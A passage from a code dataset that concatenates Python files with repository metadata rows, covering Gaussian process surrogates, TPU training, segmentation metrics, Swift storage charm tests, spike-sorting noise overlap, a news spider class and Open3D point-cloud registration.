bounds=log_bounds)
if f_opt < f_opt_star:
f_opt_star = f_opt
theta_star = theta
return theta_star
def _set_has_conditions(self) -> None:
has_conditions = len(self.configspace.get_conditions()) > 0
to_visit = []
to_visit.append(self.kernel)
while len(to_visit) > 0:
current_param = to_visit.pop(0)
if isinstance(current_param,
sklearn.gaussian_process.kernels.KernelOperator):
to_visit.insert(0, current_param.k1)
to_visit.insert(1, current_param.k2)
current_param.has_conditions = has_conditions
elif isinstance(current_param,
sklearn.gaussian_process.kernels.Kernel):
current_param.has_conditions = has_conditions
else:
raise ValueError(current_param)
class GaussianProcessRegressorARD_sklearn(Surrogate):
def __init__(self, dim, min_sample=3):
super(GaussianProcessRegressorARD_sklearn,
self).__init__(dim, min_sample)
self.cached = {}
kernel = gaussian_process.kernels.ConstantKernel(
constant_value=1 #, constant_value_bounds=(1e-4, 1e4)
) * gaussian_process.kernels.RBF(
length_scale=1 #, length_scale_bounds=(1e-4, 1e4)
)
self.gpr = gaussian_process.GaussianProcessRegressor(
kernel=kernel, n_restarts_optimizer=2)
self.is_fited = False
def fit(self, x, y):
x = np.atleast_2d(x)
if x.shape[0] < self.min_sample:
return
self.gpr.fit(x, y)
self.is_fited = True
def predict(self, newX):
assert self.is_fited
return self.gpr.predict(np.atleast_2d(newX))
def cached_predict(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached:
self.cached[key] = self.predict(newX)
return self.cached[key]
def predict_with_sigma(self, newX):
assert self.is_fited
if not self.is_fited:
return 0, np.inf
else:
mu, std = self.gpr.predict(np.atleast_2d(newX), return_std=True)
return mu, std
class GaussianProcessRegressor(Surrogate):
def __init__(self, dim, min_sample=3):
super().__init__(dim, min_sample)
self.kernel = SEkernel()
self.cached = {}
self.cached_mu_sigma = {}
self.cached_mu_cov = {}
self.is_fited = False
def fit(self, x, y):
x = np.atleast_2d(x)
if x.shape[0] < self.min_sample:
return
self.is_fited = True
self.X = x
kernel = self.kernel.compute_kernel(x)
self.L = cholesky(kernel, lower=True)
_part = solve_triangular(self.L, y, lower=True)
self.KinvY = solve_triangular(self.L.T, _part, lower=False)
def predict(self, newX):
assert self.is_fited
# Kstar = np.squeeze(self.kernel.compute_kernel(self.X, newX))
Kstar = (self.kernel.compute_kernel(self.X, newX))
return (Kstar.T @ self.KinvY).item()
def cached_predict(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached:
self.cached[key] = self.predict(newX)
return self.cached[key]
def predict_with_sigma(self, newX):
assert self.is_fited
if not hasattr(self, 'X'):
return 0, np.inf
else:
Kstar = self.kernel.compute_kernel(self.X, newX)
_LinvKstar = solve_triangular(self.L, Kstar, lower=True)
return np.squeeze(Kstar.T @ self.KinvY), np.sqrt(
self.kernel.compute_kernel(newX) - _LinvKstar.T @ _LinvKstar)
def cached_predict_with_sigma(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached_mu_sigma:
self.cached_mu_sigma[key] = self.predict_with_sigma(newX)
return self.cached_mu_sigma[key]
def cached_predict_with_cov(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached_mu_cov:
self.cached_mu_cov[key] = self.predict_with_cov(newX)
return self.cached_mu_cov[key]
def predict_with_cov(self, newX):
assert self.is_fited
if not hasattr(self, 'X'):
return 0, np.inf
else:
Kstar = self.kernel.compute_kernel(self.X, newX)
_LinvKstar = solve_triangular(self.L, Kstar, lower=True)
return np.squeeze(
Kstar.T @ self.KinvY), (self.kernel.compute_kernel(newX) -
_LinvKstar.T @ _LinvKstar)
class GaussianProcessRegressorARD_torch(Surrogate):
def __init__(self, dim, min_sample=4, name='standard'):
from botorch.models import SingleTaskGP, FixedNoiseGP
from botorch import fit_gpytorch_model
from botorch.optim import optimize_acqf
from gpytorch import ExactMarginalLogLikelihood
from gpytorch.likelihoods import GaussianLikelihood
from gpytorch.constraints import GreaterThan
Surrogate.__init__(self, dim, min_sample)
# self.cached = {}
# self.cached_mu_sigma = {}
# self.cached_mu_cov = {}
self.is_fited = False
assert name in ["standard", "gaussian"]
mapping = {
"standard": StandardTransform,
"gaussian": GaussianTransform,
}
self.normalizer = mapping[name]
# self.observed_z = torch.empty(size=(0, dim))
self.y_observed = torch.empty(size=(0, 1))
self.X_observed = torch.empty(size=(0, dim))
def transform_outputs(self, y: np.array):
# return y # TODO
psi = self.normalizer(y)
z = psi.transform(y)
return z
def fit(self, x, y):
self.X_observed = torch.cat((self.X_observed, torch.Tensor(x)), dim=0)
self.y_observed = torch.cat(
(self.y_observed, torch.Tensor(y).unsqueeze(1)), dim=0)
# x = torch.atleast_2d(x)
if self.X_observed.shape[-2] < self.min_sample:
return
self.is_fited = True
# if y.ndim == 1:
# y = y[..., None]
self.z_observed = torch.Tensor(
self.transform_outputs(self.y_observed.cpu().numpy()))
# self.gpr = SingleTaskGP(
# train_X=self.X_observed,
# train_Y=self.z_observed,
# # special likelihood for numerical Cholesky errors, following advice from
# # https://www.gitmemory.com/issue/pytorch/botorch/179/506276521
# # likelihood=GaussianLikelihood(noise_constraint=GreaterThan(1e-3)),
# )
self.gpr = FixedNoiseGP(
train_X=self.X_observed,
train_Y=self.z_observed,
train_Yvar=torch.full_like(self.z_observed, 1)
# special likelihood for numerical Cholesky errors, following advice from
# https://www.gitmemory.com/issue/pytorch/botorch/179/506276521
# likelihood=GaussianLikelihood(noise_constraint=GreaterThan(1e-3)),
)
mll = ExactMarginalLogLikelihood(self.gpr.likelihood, self.gpr)
# with gpytorch.settings.cholesky_jitter(1e-1):
fit_gpytorch_model(mll)
def get_posterior(self, newX):
assert self.is_fited
return self.gpr.posterior(torch.atleast_2d(newX))
| 36.014771
| 103
| 0.56029
| 23,636
| 0.969006
| 0
| 0
| 769
| 0.031527
| 0
| 0
| 3,759
| 0.154108
|
a24baed065a08f05a3618b4b5c209c85239d1882
| 10,112
|
py
|
Python
|
lib/training/tpu.py
|
learning-at-home/dalle
|
acf688eac206a6bcd543d56ddbb9dcf6bb72012b
|
[
"MIT"
] | null | null | null |
lib/training/tpu.py
|
learning-at-home/dalle
|
acf688eac206a6bcd543d56ddbb9dcf6bb72012b
|
[
"MIT"
] | null | null | null |
lib/training/tpu.py
|
learning-at-home/dalle
|
acf688eac206a6bcd543d56ddbb9dcf6bb72012b
|
[
"MIT"
] | null | null | null |
import ctypes
import threading
from functools import partial
from contextlib import nullcontext
from copy import deepcopy
import multiprocessing as mp
from itertools import zip_longest
from typing import Iterable
import torch
import torch.nn as nn
import torch.utils.data
import torch_xla.core.xla_model as xm
import torch_xla.distributed.xla_multiprocessing as xmp
import torch_xla.distributed.parallel_loader as pl
from hivemind.utils.logging import get_logger
logger = get_logger(__name__)
class TPUManager(mp.Process):
"""Auxiliary class that manages model training over an array of TPU cores"""
def __init__(self,
model,
dataset,
*,
collate_fn: callable = None,
nprocs: int = 8,
prefetch: int = 16,
batch_size_per_device: int = 1,
grad_accumulation_steps: int = 1,
seed_base: int = 42,
start: bool):
super().__init__()
self.lock = mp.Lock()
self.nprocs, self.prefetch, self.seed_base = nprocs, prefetch, seed_base
self.batch_size_per_device, self.grad_accumulation_steps = batch_size_per_device, grad_accumulation_steps
self.collate_fn = collate_fn
self.step_triggered, self.step_finished = mp.Event(), mp.Event()
self._synchronizer = TPUSynchronizer(model)
self._data_manager = TPUDataManager(dataset, nprocs, prefetch)
# shared fields for communicating statistics after each step
self.should_load_parameters = mp.Value(ctypes.c_bool, False)
self.gradients_accumulated = mp.Value(ctypes.c_long, 0)
self.loss_accumulated = mp.Value(ctypes.c_double, 0)
if start:
self.start()
def run(self):
thread = threading.Thread(
target=partial(xmp.spawn, self.runner, nprocs=self.nprocs, start_method='fork'),
daemon=True)
thread.start()
thread.join()
def update_model_parameters(self, new_host_parameters):
"""Schedule TPUs to update model parameters during at the beginning of the next step"""
with self.lock, torch.no_grad():
self._synchronizer.set_host_parameters(new_host_parameters)
self.should_load_parameters.value = True
def get_aggregated_gradients(self):
"""Get current accumulated gradients from the master model"""
with self.lock, torch.no_grad():
return self._synchronizer.get_aggregated_gradients()
def zero_grad(self):
"""Reset master accumulated gradients to zeros"""
with self.lock, torch.no_grad():
for param in self._synchronizer.master_model.parameters():
param.grad.zero_()
def step(self):
"""run forward/backward step with all TPUs, collect gradients"""
self.loss_accumulated.value = self.gradients_accumulated.value = 0
self.step_finished.clear()
self.step_triggered.set()
self.step_finished.wait()
return self.loss_accumulated.value, self.gradients_accumulated.value
def runner(self, tpu_index):
"""Run training steps from the perspective of a single TPU core"""
# acquire the (unique) Cloud TPU core corresponding to this process's index
device = xm.xla_device()
logger.info(f"Process {tpu_index} is using {xm.xla_real_devices([str(device)])[0]}")
# set random seed for
torch.manual_seed(self.seed_base + tpu_index)
# use staged init to minimize peak RAM usage
for init_index in range(xm.xrt_world_size()):
xm.rendezvous(f'init_{init_index}')
if tpu_index == init_index:
model = self._synchronizer.get_device_model_replica(device)
data_loader = self._data_manager.get_device_dataloader(
batch_size=self.batch_size_per_device, num_workers=0, collate_fn=self.collate_fn, pin_memory=False)
data_loader_iter = iter(data_loader)
logger.info(f"Process {tpu_index} initialized.")
xm.rendezvous('init_finished')
while True:
self.step_triggered.wait()
xm.rendezvous('before_step')
if xm.is_master_ordinal():
self.step_triggered.clear()
if bool(self.should_load_parameters.value):
with self.lock if xm.is_master_ordinal() else nullcontext():
self._synchronizer.send_params_to_device(model)
self.should_load_parameters.value = False
### compute loss and gradients
loss = 0.0
for i in range(self.grad_accumulation_steps):
inputs = next(data_loader_iter)
outputs = model(**inputs)
loss_i = outputs["loss"] if isinstance(outputs, dict) else outputs[0]
loss_i = loss_i / (self.grad_accumulation_steps * self.nprocs)
loss_i.backward()
loss += loss_i
del inputs, outputs, loss_i
### aggregate gradients from TPUs
with self.lock if xm.is_master_ordinal() else nullcontext():
self._synchronizer.aggregate_grads_on_host(model, add=True)
# clear aggregated gradients from all devices
model.zero_grad()
### accumulate statistics to host
loss = xm.all_reduce(xm.REDUCE_SUM, loss, scale=1.0)
xm.do_on_ordinals(self._mark_step_finished, data=(loss,), ordinals=(0,))
def _mark_step_finished(self, loss):
self.gradients_accumulated.value = self.batch_size_per_device * self.nprocs * self.grad_accumulation_steps
self.loss_accumulated.value = float(loss)
self.step_finished.set()
class TPUSynchronizer:
"""An auxiliary class for manipulating parameters and gradients without producing a ton of XLA graphs"""
def __init__(self, model: nn.Module):
self.master_model = model.share_memory()
for param in self.master_model.parameters():
if param.grad is None:
param.grad = torch.zeros_like(param)
param.grad = param.grad.share_memory_()
def get_device_model_replica(self, device: torch.device, tie_weights: bool = True):
replica = deepcopy(self.master_model).to(device)
if tie_weights:
replica.tie_weights()
for param in replica.parameters():
param.grad = torch.zeros_like(param, device=device)
return replica
def set_host_parameters(self, new_host_parameters):
return self._assign(source=self.master_model.parameters(), target=new_host_parameters, add=False, strict=True)
def get_aggregated_gradients(self):
return [param.grad for param in self.master_model.parameters()]
def send_params_to_device(self, replica: nn.Module):
"""Copy params from master_model to this device_model replica"""
with torch.no_grad():
replica_params = list(replica.parameters())
master_params = list(self.master_model.parameters())
master_params = xm.send_cpu_data_to_device(master_params, xm.xla_device())
self._assign(source=master_params, target=replica_params, add=False)
xm.rendezvous("params_replicated")
def aggregate_grads_on_host(self, replica: nn.Module, *, add: bool):
"""Aggregate grads from all tpu devices and move them to host"""
with torch.no_grad():
replica_grads = [param.grad for param in replica.parameters()]
replica_grads = xm.all_reduce(xm.REDUCE_SUM, replica_grads, scale=1.0)
master_grads = [hp.grad for hp in self.master_model.parameters()]
xm.do_on_ordinals(lambda *replica_grads: self._assign(source=replica_grads, target=master_grads, add=add),
data=tuple(replica_grads), ordinals=(0,))
# ^-- do_on_ordinals already runs rendezvous at the end
def _assign(self, source: Iterable[torch.Tensor], target: Iterable[torch.Tensor], add: bool, strict: bool = False):
for source_tensor, target_tensor in zip_longest(source, target):
assert source_tensor is not None or target_tensor is not None, "Source and target length must match exactly"
if strict:
assert source_tensor.shape == target_tensor.shape
assert source_tensor.device == target_tensor.device
assert source_tensor.dtype == target_tensor.dtype
if add:
target_tensor.add_(source_tensor)
else:
target_tensor.copy_(source_tensor)
class TPUDataManager:
"""An auxiliary class that loads centralized dataset from master into multiple TPU devices"""
def __init__(self, dataset: torch.utils.data.Dataset, nprocs: int, master_prefetch: int = 16):
self.dataset, self.nprocs = dataset, nprocs
self.device_queues = [mp.Queue(master_prefetch) for _ in range(nprocs)]
self._loader_thread = threading.Thread(target=self._load_data_into_queues)
self._loader_thread.start()
def _load_data_into_queues(self):
try:
for i, batch in enumerate(self.dataset):
self.device_queues[i % self.nprocs].put(batch)
finally:
logger.warning("Minibatch generator finished.")
def get_device_dataloader(self, **kwargs):
data_loader = torch.utils.data.DataLoader(QueueDataset(self.device_queues[xm.get_ordinal()]), **kwargs)
return pl.ParallelLoader(data_loader, [xm.xla_device()]).per_device_loader(xm.xla_device())
class QueueDataset(torch.utils.data.IterableDataset):
"""A dataset that ceaselessly iterates over a queue"""
def __init__(self, queue: mp.Queue):
super().__init__()
self.queue = queue
def __iter__(self):
while True:
yield self.queue.get()
def __len__(self):
return 10 ** 12 # TODO deprecate this when the issue is resolved: https://github.com/googlecolab/colabtools/issues/2237
| 43.586207
| 128
| 0.65714
| 9,603
| 0.949664
| 74
| 0.007318
| 0
| 0
| 0
| 0
| 1,542
| 0.152492
|
a24d8145f2c40687cee72c78a8cd67399721ce08
| 1,819
|
py
|
Python
|
code/evaluate.py
|
xuyangcao/SegWithDistMap
|
9638aaacf15dba6c2f907e5e82f8ed37a786bc96
|
[
"Apache-2.0"
] | 3
|
2021-01-29T16:03:39.000Z
|
2021-12-16T04:40:28.000Z
|
code/evaluate.py
|
xuyangcao/SegWithDistMap
|
9638aaacf15dba6c2f907e5e82f8ed37a786bc96
|
[
"Apache-2.0"
] | null | null | null |
code/evaluate.py
|
xuyangcao/SegWithDistMap
|
9638aaacf15dba6c2f907e5e82f8ed37a786bc96
|
[
"Apache-2.0"
] | 2
|
2019-12-20T13:15:08.000Z
|
2020-01-02T15:49:16.000Z
|
import numpy as np
import os
import argparse
import tqdm
import pandas as pd
import SimpleITK as sitk
from medpy import metric
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--file_path', type=str, default='./results/abus_roi/0108_dice_1/')
args = parser.parse_args()
# save csv file to the current folder
if args.file_path[-1] == '/':
args.save = args.file_path[:-1] + '.csv'
else:
args.save = args.file_path + '.csv'
return args
def main():
args = get_args()
dsc_list = []
jc_list = []
hd_list = []
hd95_list = []
asd_list = []
filenames = os.listdir(args.file_path)
for filename in tqdm.tqdm(filenames):
gt_img = sitk.ReadImage(os.path.join(args.file_path, filename+'/gt.nii.gz'))
gt_volume = sitk.GetArrayFromImage(gt_img)
pre_img = sitk.ReadImage(os.path.join(args.file_path, filename+'/pred.nii.gz'))
pre_volume = sitk.GetArrayFromImage(pre_img)
dsc = metric.binary.dc(pre_volume, gt_volume)
jc = metric.binary.jc(pre_volume, gt_volume)
hd = metric.binary.hd(pre_volume, gt_volume, voxelspacing=(0.4, 0.4, 0.4))
hd95 = metric.binary.hd95(pre_volume, gt_volume, voxelspacing=(0.4, 0.4, 0.4))
asd = metric.binary.asd(pre_volume, gt_volume, voxelspacing=(0.4, 0.4, 0.4))
dsc_list.append(dsc)
jc_list.append(jc)
hd_list.append(hd)
hd95_list.append(hd95)
asd_list.append(asd)
df = pd.DataFrame()
df['name'] = filenames
df['dsc'] = np.array(dsc_list)
df['jc'] = np.array(jc_list)
df['hd'] = np.array(hd_list)
df['hd95'] = np.array(hd95_list)
df['asd'] = np.array(asd_list)
print(df.describe())
df.to_csv(args.save)
if __name__ == '__main__':
main()
| 29.33871
| 91
| 0.630566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 164
| 0.090159
|
a2513b451ec5004528a7e01bf0d9f3485e85254c
| 64
|
py
|
Python
|
integraph/core/__init__.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
integraph/core/__init__.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
integraph/core/__init__.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
from .taxid import TaxId
from .uri import URIManager, URIMapper
| 21.333333
| 38
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
a253f668fac9338a8b6bc1ab3d03ebaeb0518c82
| 4,170
|
py
|
Python
|
unit_tests/test_swift_storage_context.py
|
coreycb/charm-swift-storage
|
c31991ab198d7b51b9a4f5744a1fcc1fef0bc1ef
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
unit_tests/test_swift_storage_context.py
|
coreycb/charm-swift-storage
|
c31991ab198d7b51b9a4f5744a1fcc1fef0bc1ef
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
unit_tests/test_swift_storage_context.py
|
coreycb/charm-swift-storage
|
c31991ab198d7b51b9a4f5744a1fcc1fef0bc1ef
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mock import MagicMock
from test_utils import CharmTestCase, patch_open
import lib.swift_storage_context as swift_context
TO_PATCH = [
'config',
'log',
'related_units',
'relation_get',
'relation_ids',
'unit_private_ip',
'get_ipv6_addr',
]
class SwiftStorageContextTests(CharmTestCase):
def setUp(self):
super(SwiftStorageContextTests, self).setUp(swift_context, TO_PATCH)
self.config.side_effect = self.test_config.get
def test_swift_storage_context_missing_data(self):
self.relation_ids.return_value = []
ctxt = swift_context.SwiftStorageContext()
self.assertEquals(ctxt(), {})
self.relation_ids.return_value = ['swift-proxy:0']
self.related_units.return_value = ['swift-proxy/0']
self.relation_get.return_value = ''
self.assertEquals(ctxt(), {})
def test_swift_storage_context_with_data(self):
self.relation_ids.return_value = []
ctxt = swift_context.SwiftStorageContext()
self.assertEquals(ctxt(), {})
self.relation_ids.return_value = ['swift-proxy:0']
self.related_units.return_value = ['swift-proxy/0']
self.relation_get.return_value = 'fooooo'
self.assertEquals(ctxt(), {'swift_hash': 'fooooo'})
def test_rsync_context(self):
self.unit_private_ip.return_value = '10.0.0.5'
ctxt = swift_context.RsyncContext()
ctxt.enable_rsyncd = MagicMock()
ctxt.enable_rsyncd.return_value = True
self.assertEquals({'local_ip': '10.0.0.5'}, ctxt())
self.assertTrue(ctxt.enable_rsyncd.called)
def test_rsync_context_ipv6(self):
self.test_config.set('prefer-ipv6', True)
self.get_ipv6_addr.return_value = ['2001:db8:1::1']
ctxt = swift_context.RsyncContext()
ctxt.enable_rsyncd = MagicMock()
ctxt.enable_rsyncd.return_value = True
self.assertEquals({'local_ip': '2001:db8:1::1'}, ctxt())
self.assertTrue(ctxt.enable_rsyncd.called)
def test_rsync_enable_rsync(self):
with patch_open() as (_open, _file):
ctxt = swift_context.RsyncContext()
_file.read.return_value = 'RSYNC_ENABLE=false'
ctxt.enable_rsyncd()
_file.write.assert_called_with('RSYNC_ENABLE=true')
_file.read.return_value = '#foo'
ctxt.enable_rsyncd()
_file.write.assert_called_with('RSYNC_ENABLE=true\n')
def test_swift_storage_server_context(self):
self.unit_private_ip.return_value = '10.0.0.5'
self.test_config.set('account-server-port', '500')
self.test_config.set('object-server-port', '501')
self.test_config.set('container-server-port', '502')
self.test_config.set('object-server-threads-per-disk', '3')
self.test_config.set('object-replicator-concurrency', '3')
self.test_config.set('account-max-connections', '10')
self.test_config.set('container-max-connections', '10')
self.test_config.set('object-max-connections', '10')
ctxt = swift_context.SwiftStorageServerContext()
result = ctxt()
ex = {
'container_server_port': '502',
'object_server_port': '501',
'account_server_port': '500',
'local_ip': '10.0.0.5',
'object_server_threads_per_disk': '3',
'object_replicator_concurrency': '3',
'account_max_connections': '10',
'container_max_connections': '10',
'object_max_connections': '10',
}
self.assertEquals(ex, result)
| 38.971963
| 76
| 0.664508
| 3,318
| 0.795683
| 0
| 0
| 0
| 0
| 0
| 0
| 1,390
| 0.333333
|
a2567fe63fe79e43c35228a0d120b319e330a8d1
| 5,956
|
py
|
Python
|
spiketoolkit/validation/quality_metric_classes/noise_overlap.py
|
ferchaure/spiketoolkit
|
0b1deea724f742797181bb4fe57270fdd84951c1
|
[
"MIT"
] | null | null | null |
spiketoolkit/validation/quality_metric_classes/noise_overlap.py
|
ferchaure/spiketoolkit
|
0b1deea724f742797181bb4fe57270fdd84951c1
|
[
"MIT"
] | null | null | null |
spiketoolkit/validation/quality_metric_classes/noise_overlap.py
|
ferchaure/spiketoolkit
|
0b1deea724f742797181bb4fe57270fdd84951c1
|
[
"MIT"
] | null | null | null |
import numpy as np
from copy import copy
from .utils.thresholdcurator import ThresholdCurator
from .quality_metric import QualityMetric
import spiketoolkit as st
import spikemetrics.metrics as metrics
from spikemetrics.utils import printProgressBar
from collections import OrderedDict
from sklearn.neighbors import NearestNeighbors
from .parameter_dictionaries import update_all_param_dicts_with_kwargs
class NoiseOverlap(QualityMetric):
installed = True # check at class level if installed or not
installation_mesg = "" # err
params = OrderedDict([('max_spikes_per_unit_for_noise_overlap', 1000), ('num_features', 10),
('num_knn', 6)])
curator_name = "ThresholdNoiseOverlaps"
def __init__(self, metric_data):
QualityMetric.__init__(self, metric_data, metric_name="noise_overlap")
if not metric_data.has_recording():
raise ValueError("MetricData object must have a recording")
def compute_metric(self, max_spikes_per_unit_for_noise_overlap, num_features, num_knn, **kwargs):
params_dict = update_all_param_dicts_with_kwargs(kwargs)
save_property_or_features = params_dict['save_property_or_features']
seed = params_dict['seed']
waveforms = st.postprocessing.get_unit_waveforms(
self._metric_data._recording,
self._metric_data._sorting,
unit_ids=self._metric_data._unit_ids,
max_spikes_per_unit=max_spikes_per_unit_for_noise_overlap,
**kwargs
)
if seed is not None:
np.random.seed(seed)
noise_overlaps = []
for i_u, unit in enumerate(self._metric_data._unit_ids):
if self._metric_data.verbose:
printProgressBar(i_u + 1, len(self._metric_data._unit_ids))
wfs = waveforms[i_u]
times = self._metric_data._sorting.get_unit_spike_train(unit_id=unit)
if len(wfs) > max_spikes_per_unit_for_noise_overlap:
selecte_idxs = np.random.choice(times, size=max_spikes_per_unit_for_noise_overlap)
wfs = wfs[selecte_idxs]
# get clip_size from waveforms shape
clip_size = wfs.shape[-1]
num_clips = len(wfs)
min_time = np.min(times)
max_time = np.max(times)
times_control = np.random.choice(np.arange(min_time, max_time), size=num_clips)
clips = copy(wfs)
clips_control = np.stack(self._metric_data._recording.get_snippets(snippet_len=clip_size,
reference_frames=times_control))
template = np.median(wfs, axis=0)
max_ind = np.unravel_index(np.argmax(np.abs(template)), template.shape)
chmax = max_ind[0]
tmax = max_ind[1]
max_val = template[chmax, tmax]
weighted_clips_control = np.zeros(clips_control.shape)
weights = np.zeros(num_clips)
for j in range(num_clips):
clip0 = clips_control[j, :, :]
val0 = clip0[chmax, tmax]
weight0 = val0 * max_val
weights[j] = weight0
weighted_clips_control[j, :, :] = clip0 * weight0
noise_template = np.sum(weighted_clips_control, axis=0)
noise_template = noise_template / np.sum(np.abs(noise_template)) * np.sum(np.abs(template))
for j in range(num_clips):
clips[j, :, :] = _subtract_clip_component(clips[j, :, :], noise_template)
clips_control[j, :, :] = _subtract_clip_component(clips_control[j, :, :], noise_template)
all_clips = np.concatenate([clips, clips_control], axis=0)
num_channels_wfs = all_clips.shape[1]
num_samples_wfs = all_clips.shape[2]
all_features = _compute_pca_features(all_clips.reshape((num_clips * 2,
num_channels_wfs * num_samples_wfs)), num_features)
num_all_clips=len(all_clips)
distances, indices = NearestNeighbors(n_neighbors=min(num_knn + 1, num_all_clips - 1), algorithm='auto').fit(
all_features.T).kneighbors()
group_id = np.zeros((num_clips * 2))
group_id[0:num_clips] = 1
group_id[num_clips:] = 2
num_match = 0
total = 0
for j in range(num_clips * 2):
for k in range(1, min(num_knn + 1, num_all_clips - 1)):
ind = indices[j][k]
if group_id[j] == group_id[ind]:
num_match = num_match + 1
total = total + 1
pct_match = num_match / total
noise_overlap = 1 - pct_match
noise_overlaps.append(noise_overlap)
noise_overlaps = np.asarray(noise_overlaps)
if save_property_or_features:
self.save_property_or_features(self._metric_data._sorting, noise_overlaps, self._metric_name)
return noise_overlaps
def threshold_metric(self, threshold, threshold_sign, max_spikes_per_unit_for_noise_overlap,
num_features, num_knn, **kwargs):
noise_overlaps = self.compute_metric(max_spikes_per_unit_for_noise_overlap, num_features, num_knn, **kwargs)
threshold_curator = ThresholdCurator(sorting=self._metric_data._sorting, metric=noise_overlaps)
threshold_curator.threshold_sorting(threshold=threshold, threshold_sign=threshold_sign)
return threshold_curator
def _compute_pca_features(X, num_components):
u, s, vt = np.linalg.svd(X)
return u[:, :num_components].T
def _subtract_clip_component(clip1, component):
V1 = clip1.flatten()
V2 = component.flatten()
V1 = V1 - np.mean(V1)
V2 = V2 - np.mean(V2)
V1 = V1 - V2 * np.dot(V1, V2) / np.dot(V2, V2)
return V1.reshape(clip1.shape)
| 45.121212
| 121
| 0.631632
| 5,193
| 0.871894
| 0
| 0
| 0
| 0
| 0
| 0
| 266
| 0.044661
|
a256bf58e2a1c3f65c6795ace24758ddfe629807
| 1,397
|
py
|
Python
|
lib/spider/NewsSpider1.py
|
ardegra/standard.api
|
36856acf3820cfc33def26f9737d6a682fba94ee
|
[
"MIT"
] | null | null | null |
lib/spider/NewsSpider1.py
|
ardegra/standard.api
|
36856acf3820cfc33def26f9737d6a682fba94ee
|
[
"MIT"
] | null | null | null |
lib/spider/NewsSpider1.py
|
ardegra/standard.api
|
36856acf3820cfc33def26f9737d6a682fba94ee
|
[
"MIT"
] | null | null | null |
import json
import pymongo
import falcon
from bson import json_util
class NewsSpider1:
def __init__(self, **kwargs):
self.name = kwargs.get("name", None)
self.country = kwargs.get("country", None)
self.category = kwargs.get("category", None)
self.entryDateParser = kwargs.get("entryDateParser", None)
self.ignoreDomainList = kwargs.get("ignoreDomainList", None)
self.indexMaxPageNumber = kwargs.get("indexMaxPageNumber", None)
self.indexUrl = kwargs.get("indexUrl", None)
self.type = kwargs.get("type", None)
self.xpath = kwargs.get("xpath", None)
def from_document(self, document):
self.name = document["name"]
self.country = document["country"]
self.category = document["category"]
self.entryDateParser = document["entryDateParser"]
self.ignoreDomainList = document["ignoreDomainList"]
self.indexMaxPageNumber = document["indexMaxPageNumber"]
self.indexUrl = document["indexUrl"]
self.type = document["type"]
self.xpath = document["xpath"]
def to_dict(self):
return {
"name": self.name,
"country": self.country,
"category": self.category,
"entryDateParser": self.entryDateParser,
"ignoreDomainList": self.ignoreDomainList,
"indexMaxPageNumber": self.indexMaxPageNumber,
"indexUrl": self.indexUrl,
"type": self.type,
"xpath": self.xpath,
}
| 32.488372
| 68
| 0.680029
| 1,326
| 0.949177
| 0
| 0
| 0
| 0
| 0
| 0
| 309
| 0.221188
|
a2575cc36e877edd1ee71f8adfedc976cf489a26
| 4,152
|
py
|
Python
|
core/global_registration.py
|
MichaelArbel/OT-sync
|
0b8308375b0064a9ada3f8741f04551a3ba29b63
|
[
"BSD-3-Clause"
] | 2
|
2021-04-04T22:49:06.000Z
|
2021-08-09T12:19:30.000Z
|
core/global_registration.py
|
hrheydarian/OT-sync
|
0b8308375b0064a9ada3f8741f04551a3ba29b63
|
[
"BSD-3-Clause"
] | null | null | null |
core/global_registration.py
|
hrheydarian/OT-sync
|
0b8308375b0064a9ada3f8741f04551a3ba29b63
|
[
"BSD-3-Clause"
] | 1
|
2021-08-09T12:19:03.000Z
|
2021-08-09T12:19:03.000Z
|
# Open3D: www.open3d.org
# The MIT License (MIT)
# See license file or visit www.open3d.org for details
# examples/Python/Advanced/global_registration.py
import open3d as o3d
import numpy as np
import copy
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
o3d.visualization.draw_geometries([source_temp, target_temp])
def preprocess_point_cloud(pcd, voxel_size):
print(":: Downsample with a voxel size %.3f." % voxel_size)
pcd_down = pcd.voxel_down_sample(voxel_size)
radius_normal = voxel_size * 2
print(":: Estimate normal with search radius %.3f." % radius_normal)
pcd_down.estimate_normals(
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))
radius_feature = voxel_size * 5
print(":: Compute FPFH feature with search radius %.3f." % radius_feature)
pcd_fpfh = o3d.registration.compute_fpfh_feature(
pcd_down,
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))
return pcd_down, pcd_fpfh
def prepare_dataset(voxel_size):
print(":: Load two point clouds and disturb initial pose.")
source = o3d.io.read_point_cloud("../../TestData/ICP/cloud_bin_0.pcd")
target = o3d.io.read_point_cloud("../../TestData/ICP/cloud_bin_1.pcd")
trans_init = np.asarray([[0.0, 0.0, 1.0, 0.0], [1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.0]])
source.transform(trans_init)
draw_registration_result(source, target, np.identity(4))
source_down, source_fpfh = preprocess_point_cloud(source, voxel_size)
target_down, target_fpfh = preprocess_point_cloud(target, voxel_size)
return source, target, source_down, target_down, source_fpfh, target_fpfh
